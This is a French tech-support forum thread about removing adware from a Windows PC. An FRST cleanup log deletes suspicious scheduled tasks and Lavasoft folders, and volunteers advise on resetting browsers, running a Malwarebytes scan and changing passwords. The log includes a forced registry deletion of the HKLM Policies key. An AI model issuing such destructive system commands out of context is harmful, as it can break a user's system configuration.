"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C57ECFFD-5417-4A20-8669-65695984A784}" => non trouvé(e)
"C:\Windows\System32\Tasks\carbonite" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\carbonite" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D14A5F09-097D-47E9-8F98-41E4626426D3}" => non trouvé(e)
"C:\Windows\System32\Tasks\CClean_Data" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CClean_Data" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{40191676-3FA5-4E9F-9F56-DDC97C9F03E2}" => non trouvé(e)
"C:\Windows\System32\Tasks\CcleanUpdata23" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CcleanUpdata23" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A8CECACF-A588-48C0-9BF9-E49EAD29DD7E}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A8CECACF-A588-48C0-9BF9-E49EAD29DD7E}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\CCVVTOOLS => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CCVVTOOLS" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BFF4187F-1E8D-462A-A02F-28A4575019F7}" => non trouvé(e)
"C:\Windows\System32\Tasks\fleer" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fleer" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{44A4D8A3-2A57-4F64-B22A-C593A3A0F2D3}" => non trouvé(e)
"C:\Windows\System32\Tasks\generator" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\generator" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E995BEA3-2EEC-4F6D-BB1A-42BAEE0270E1}" => non trouvé(e)
"C:\Windows\System32\Tasks\glycerogelatin" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\glycerogelatin" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A49D5946-A2E1-4B89-8952-66F1444914D4}" => non trouvé(e)
"C:\Windows\System32\Tasks\HDAudio" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HDAudio" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F4338805-2D2E-4D28-B786-A6E60840F38D}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4338805-2D2E-4D28-B786-A6E60840F38D}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\LocomotivaCDT => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LocomotivaCDT" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52DF0E51-22ED-407C-AF06-64052EDEF201}" => non trouvé(e)
"C:\Windows\System32\Tasks\monodomains" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\monodomains" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{64DC7155-7E05-4000-867C-76917E1344A9}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{64DC7155-7E05-4000-867C-76917E1344A9}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Mozilla\Firefox Background Update S-1-5-21-552949202-3956616510-728353980-1001 308046B0AF4A39CB => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mozilla\Firefox Background Update S-1-5-21-552949202-3956616510-728353980-1001 308046B0AF4A39CB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23561EE3-2ABF-4D96-98ED-A3F1314536F5}" => non trouvé(e)
"C:\Windows\System32\Tasks\myrmecophilous" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\myrmecophilous" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8831E937-08FD-43D3-9A44-C85E5C9A7B20}" => non trouvé(e)
"C:\Windows\System32\Tasks\nicolo" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nicolo" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F93139ED-4E86-4382-9276-6AF8929A20C4}" => non trouvé(e)
"C:\Windows\System32\Tasks\obstetricious" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\obstetricious" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EFA064A3-DCFA-466D-A53D-44828F414BE5}" => non trouvé(e)
"C:\Windows\System32\Tasks\RegisterDevicePeriodic36" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegisterDevicePeriodic36" => non trouvé(e)

"C:\Users\relaisdupre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lavasoft" Dossier déplacer:

C:\Users\relaisdupre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lavasoft => déplacé(es) avec succès

"C:\Users\relaisdupre\AppData\Roaming\Lavasoft" Dossier déplacer:

C:\Users\relaisdupre\AppData\Roaming\Lavasoft => déplacé(es) avec succès

"C:\Users\relaisdupre\AppData\Local\Lavasoft" Dossier déplacer:

C:\Users\relaisdupre\AppData\Local\Lavasoft => déplacé(es) avec succès

"C:\ProgramData\Lavasoft" Dossier déplacer:

C:\ProgramData\Lavasoft => déplacé(es) avec succès

========= reg delete HKLM\SOFTWARE\Policies /f =========

Erreurÿ: La demande de suppression est partiellement effectu‚e.

[Parisien_entraide]

Meme si on n'y connait rien il suffit de suivre ce qu'a indiqué Malekal

Tu as effectué les points 2 et et 3 de son message avant de refaire un scan FRST ?

[maison88]

J'ai paramétré manuellement Chrome et Edge pour ne pas risquer de perdre des favoris importants. CCleaner est également désinstallé.

Peut-être que je les ai fait dans le désordre dans la précipitation et je m'en excuse.

Je suis prêt à refaire un scan FRST + rapports au besoin.

Merci de votre patience en tout cas.

[Parisien_entraide]

Ce que tu as fais ne sert à rien.
Changer les paramètres ne change rien si il y a une infection cachée

Visiblement tu n'as pas lu le lien concernant la réinitialisation
Tu ne perds pas tes favoris

C'est indiqué dans le tuto de Malekal concernant Chrome par ex

• Les paramètres et les raccourcis de Google Chrome seront réinitialisés
  Les extensions seront désactivées
  Les cookies et les autres données de sites temporaires seront supprimées
  Vous gardez les données utilisateurs comme les favoris, l’historique et les mots de passe enregistrés

Au pire ou par précaution cela se sauvegarde les favoris
https://www.malekal.com/chrome-exporter ... r-favoris/

[maison88]

Bon et bien je suis bon pour tout refaire.

Je recréerai un autre sujet histoire de reprendre toute la procédure à zéro.

Merci et à la prochaine.

[Malekal_morte]

Ca semble pas.
MBAM détecte encore des choses ?
Si oui donne le rapport.

[maison88]

Bonjour,

Un scan complet du disque fait avec Malwarebytes hier (Plus de 12 heures d'analyse !) n'a rien trouvé.

-Résumé de l’analyse-
Type d’analyse: Analyse personnalisée
Analyse lancée par: Manuelle
Résultat: Terminé
Objets analysés: 1350297
Menaces détectées: 0
Menaces mises en quarantaine: 0
Temps écoulé: 12 h, 0 min, 53 s

[Malekal_morte]

ok plus de publicités ou fenêtre qui s'ouvrent ?

[maison88]

Non plus rien du tout depuis lundi dernier.

[Malekal_morte]

Dans ce cas, c'est terminé =)

A lire : que faire après une attaque de virus informatique.
Change tes mots de passe et suis les instructions pour la bonne conduite pour ne plus te faire infecter.

Pour éviter les virus, il faut savoir comment les pirates s'y prennent pour infecter les ordinateurs : Comment les virus informatiques sont distribués
Enfin pour protéger ton PC : Comment protéger son PC des virus et des pirates ?

Si l'aide t'a contenu ou si les tutoriels du site t'ont aidé, tu peux prendre le temps d'évaluer le site sur Bing, ce serait sympa : Evaluer le site malekal.com

[maison88]

Au top, merci beaucoup !

Par contre le lien pour évaluation ne fonctionne pas :(